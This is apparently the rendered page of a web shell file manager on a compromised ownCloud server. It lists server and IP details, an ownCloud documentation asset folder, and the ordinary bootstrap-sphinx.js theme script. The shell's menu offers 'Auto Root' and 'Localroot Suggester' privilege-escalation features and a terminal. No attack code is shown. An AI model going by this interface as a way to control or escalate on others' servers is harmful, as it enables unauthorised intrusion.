Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
owncloud-prm /
core /
doc /
admin /
_static /
Delete
Unzip
Name
Size
Permission
Date
Action
bootstrap-3.1.0
[ DIR ]
drwxr-xr-x
2018-04-19 18:17
fonts
[ DIR ]
drwxr-xr-x
2018-04-19 18:17
img
[ DIR ]
drwxr-xr-x
2018-04-19 18:17
js
[ DIR ]
drwxr-xr-x
2018-04-19 18:17
social
[ DIR ]
drwxr-xr-x
2018-04-19 18:17
ajax-loader.gif
673
B
-rw-r--r--
2017-07-02 11:28
basic.css
10.08
KB
-rw-r--r--
2018-04-19 18:17
bootstrap-sphinx.css
2.84
KB
-rw-r--r--
2018-04-19 18:17
bootstrap-sphinx.js
4.93
KB
-rw-r--r--
2018-04-19 18:17
comment-bright.png
756
B
-rw-r--r--
2017-07-02 11:28
comment-close.png
829
B
-rw-r--r--
2017-07-02 11:28
comment.png
641
B
-rw-r--r--
2017-07-02 11:28
doctools.js
7.97
KB
-rw-r--r--
2018-04-19 18:17
down-pressed.png
222
B
-rw-r--r--
2017-07-02 11:28
down.png
202
B
-rw-r--r--
2017-07-02 11:28
file.png
286
B
-rw-r--r--
2017-07-02 11:28
jquery-3.1.0.js
257.58
KB
-rw-r--r--
2017-07-02 11:28
jquery.js
84.33
KB
-rw-r--r--
2017-09-19 11:58
logo-blue.pdf
1.81
KB
-rw-r--r--
2018-04-19 18:16
logo-blue.png
6.05
KB
-rw-r--r--
2018-04-19 18:16
main.min.css
124.12
KB
-rw-r--r--
2018-04-19 18:16
minus.png
90
B
-rw-r--r--
2017-07-02 11:28
plus.png
90
B
-rw-r--r--
2017-07-02 11:28
pygments.css
4.29
KB
-rw-r--r--
2018-04-19 18:17
searchtools.js
24.78
KB
-rw-r--r--
2018-04-19 18:17
styles.css
10.39
KB
-rw-r--r--
2018-04-19 18:16
underscore-1.3.1.js
34.34
KB
-rw-r--r--
2017-07-02 11:28
underscore.js
11.86
KB
-rw-r--r--
2017-07-02 11:28
up-pressed.png
214
B
-rw-r--r--
2017-07-02 11:28
up.png
203
B
-rw-r--r--
2017-07-02 11:28
websupport.js
24.76
KB
-rw-r--r--
2017-07-02 11:28
Save
Rename
(function ($) { /** * Patch TOC list. * * Will mutate the underlying span to have a correct ul for nav. * * @param $span: Span containing nested UL's to mutate. * @param minLevel: Starting level for nested lists. (1: global, 2: local). */ var patchToc = function ($ul, minLevel) { var findA, patchTables, $localLi; // Find all a "internal" tags, traversing recursively. findA = function ($elem, level) { level = level || 0; var $items = $elem.find("> li > a.internal, > ul, > li > ul"); // Iterate everything in order. $items.each(function (index, item) { var $item = $(item), tag = item.tagName.toLowerCase(), $childrenLi = $item.children('li'), $parentLi = $($item.parent('li'), $item.parent().parent('li')); // Add dropdowns if more children and above minimum level. if (tag === 'ul' && level >= minLevel && $childrenLi.length > 0) { $parentLi .addClass('dropdown-submenu') .children('a').first().attr('tabindex', -1); $item.addClass('dropdown-menu'); } findA($item, level + 1); }); }; findA($ul); }; /** * Patch all tables to remove ``docutils`` class and add Bootstrap base * ``table`` class. */ patchTables = function () { $("table.docutils") .removeClass("docutils") .addClass("table") .attr("border", 0); }; $(window).load(function () { /* * Scroll the window to avoid the topnav bar * https://github.com/twitter/bootstrap/issues/1768 */ if ($("#navbar.navbar-fixed-top").length > 0) { var navHeight = $("#navbar").height(), shiftWindow = function() { scrollBy(0, -navHeight - 10); }; if (location.hash) { setTimeout(shiftWindow, 1); } window.addEventListener("hashchange", shiftWindow); } }); $(document).ready(function () { // Add styling, structure to TOC's. $(".dropdown-menu").each(function () { $(this).find("ul").each(function (index, item){ var $item = $(item); $item.addClass('unstyled'); }); }); // Global TOC. if ($("ul.globaltoc li").length) { patchToc($("ul.globaltoc"), 1); } else { // Remove Global TOC. $(".globaltoc-container").remove(); } // Local TOC. $(".bs-sidenav ul").addClass("nav nav-list"); $(".bs-sidenav > ul > li > a").addClass("nav-header"); // back to top setTimeout(function () { var $sideBar = $('.bs-sidenav'); $sideBar.affix({ offset: { top: function () { var offsetTop = $sideBar.offset().top; var sideBarMargin = parseInt($sideBar.children(0).css('margin-top'), 10); var navOuterHeight = $('#navbar').height(); return (this.top = offsetTop - navOuterHeight - sideBarMargin); } , bottom: function () { // add 25 because the footer height doesn't seem to be enough return (this.bottom = $('.footer').outerHeight(true) + 25); } } }); }, 100); // Local TOC. patchToc($("ul.localtoc"), 2); // Mutate sub-lists (for bs-2.3.0). $(".dropdown-menu ul").not(".dropdown-menu").each(function () { var $ul = $(this), $parent = $ul.parent(), tag = $parent[0].tagName.toLowerCase(), $kids = $ul.children().detach(); // Replace list with items if submenu header. if (tag === "ul") { $ul.replaceWith($kids); } else if (tag === "li") { // Insert into previous list. $parent.after($kids); $ul.remove(); } }); // Add divider in page TOC. $localLi = $("ul.localtoc li"); if ($localLi.length > 2) { $localLi.first().after('<li class="divider"></li>'); } // Manually add dropdown. // Appears unnecessary as of: // https://github.com/ryan-roemer/sphinx-bootstrap-theme/pull/90 // Remove next time around... // a.dropdown-toggle class needed in globaltoc.html //$('.dropdown-toggle').dropdown(); // Patch tables. patchTables(); // Add Note, Warning styles. (BS v2,3 compatible). $('.admonition').addClass('alert alert-info') .filter('.warning, .caution') .removeClass('alert-info') .addClass('alert-warning').end() .filter('.error, .danger') .removeClass('alert-info') .addClass('alert-danger alert-error').end(); // Inline code styles to Bootstrap style. $('tt.docutils.literal').not(".xref").each(function (i, e) { // ignore references if (!$(e).parent().hasClass("reference")) { $(e).replaceWith(function () { return $("<code />").html($(this).html()); }); }}); // Update sourcelink to remove outerdiv (fixes appearance in navbar). var $srcLink = $(".nav #sourcelink"); $srcLink.parent().html($srcLink.html()); }); }(window.$jqTheme || window.jQuery));